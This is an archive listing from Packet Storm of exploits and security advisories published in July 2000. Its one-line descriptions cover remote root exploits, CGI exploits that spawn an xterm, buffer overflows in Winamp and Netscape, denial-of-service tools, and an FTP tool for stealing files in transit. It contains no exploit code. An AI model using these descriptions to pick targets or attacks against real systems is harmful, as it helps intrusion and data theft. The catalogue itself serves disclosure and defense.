Packet Storm new exploits for July, 2000.
82865022ac9064a9bf0fe1824dc88233NCSA Httpd v1.3 remote root exploit. Tested against Slackware 4.0.
d3cb7f11c6d033347321f63e6d8c5974Bajie is a freeware HTTP daemon written in Java has vulnerabilities which allow remote users to view any file on the system, and find out the real server path.
4df55cb734e84869146afb3bb2d45856Foundstone Security Advisory - Two show code vulnerabilities exist with BEA's WebLogic 5.1.0 allowing an attacker to view the source code of any file within the web document root of the web server. Depending on web application and directory structure attacker can access and view unauthorized files. Proof of concept URL's included.
eabfb1cb192fae14880ee2af89f74ca8CVS v1.10.8 allows users to execute any binary on the server using CVS/Checkin.prog or CVS/Update.prog.
f51d22de8758d323545e1452dac4d417BitchX-75p3 local exploit, Redhat 6.2 x86.
3107c544958dc3c7abc51124de021beaThe D-Link DI-701 Residential Gateway has an open port which allows brute force password guessing, and has a factory set default password.
d96b5c738ace00b9ee7a62a0b8b478edWinamp contains a buffer overflow in its M3U playlist parser. It is possible to execute arbitrary code on a remote computer via a malicious playlist. Proof of concept playlist included.
e4df2a791d526904b5ed2ac47c2e2cf7Foundstone Security Advisory - AnalogX SimpleServer:WWW v1.06 and below is vulnerable to a "relative directory path" attack that allows a remote user to retrieve any known file one the the server.
4e3ed0a0db03245950db00b35d595d3fISBASE Security Advisory(SA2000-02) - Microsoft IIS v4.0 and 5.0 for Windows NT and Windows 2000 sometimes displays the contents of files that should not normally be displayed and sometimes contains sensitive data. ISS can be tricked into calling ISM.DLL and exposing the contents of .asp, .asa, and .ini files. Exploit description included.
41dddbddcf166833521727533f77223cFoundstone Security Advisory - AnalogX Proxy v4.04 contains multiple buffer overflows. Includes several proof of concept denial of service examples.
b35dcbfc570f44addb330eee78d4c138Netscape 4.73 and below remote proof of concept exploit for linux/x86. Includes a test image which crashes Netscape, a JFIF file compiler which exploits the COM marker processing vulnerability, and an unofficial patch for Mozilla M15 and Win32 Netscape.
05b9879474e6b8988cd3141760e07826Netscape browsers v4.73 and below can be tricked into executing arbitrary assembly code by a malicious web site. In the case of Netscape Mail or News, the attack may be performed via a mail message or a news article, as well. A bug in the way Netscape browsers use the Independent JPEG Group's decoder library can cause the JPEG stream to be read onto the heap. Exploiting this vulnerability into executing arbitrary code is non-trivial, but possible on some platforms.
e3075f2ff193830fb17cb6c212c3b75cWFTPD/WFTPD Pro 2.41 RC11 contains four remote denial of service vulnerabilities. Perl proof of concept code included for each.
8ed2c7bb5eec4648fb264eabbac60bdafawx2.c sends fragmented junk to port 139, causing a blue screen under Windows 95 / 98 / 2000.
ad5c8fa7466f3e088f064eb42970726fPassive Agression is a perl proof-of-concept exploit for downloading other user's files from FTP servers without needing thier authentication. It works against servers that use passive connections for data transfers and fail to check the incoming address of the data connection. It first attempts to determine the server-side data port incrementation rate and then guesses at the next port, makes a connection, and saves the retrieved data to a file. This does not work against M$ boxen, but is fairly impressive when run against large public FTP servers. A much more sinister purpose would be to snag confidential files being passed between corporate networks at scheduled times, like end of the day batch processing of customer orders, or crontab'd FTP backups.
40e4c6f40135e9d7fa06da90c1ccab3aForm Mail v1.0 (form.cgi) remote exploit - spawns an xterm from the victim computer.
c5d2f7a2b3ce3a62e0264b14bca2da10Click Responder v1.02 remote exploit - spawns an xterm from the victim computer.
6d00b6696423fcad56ad057857da27efbulk.cgi is a Bulk Mailer CGI which has remote vulernabilities which allow an attacker to spawn an xterm.
1514c36c80d0afe2d5806a1eb2219d5cAlienForm2 remote cgi exploit - Spawns an xterm from target machine.
6bc28f67301d57d5da9e5441634a4767bnbform.cgi v4.0 and below remote exploit - reads any file on the system.
23e7199f2af13c5245305c230cc7d928BitchX (75p3/1.0c16) local exploit.
806d8b4ddd170a579ccfbf244c5bfe74Wu-ftpd v2.4(4) remote root exploit. Exploits the SITE EXEC buffer overflow.
4e2448f983f9d4203d6c98568488a4f0PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.
45d6b20eb27f16d77c63be97ae0b0325Remote buffer overflow exploit for the wn webserver for linux version v2.0.9 and below.
d9b917dd25c194f88b6e195878bf4a0d
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
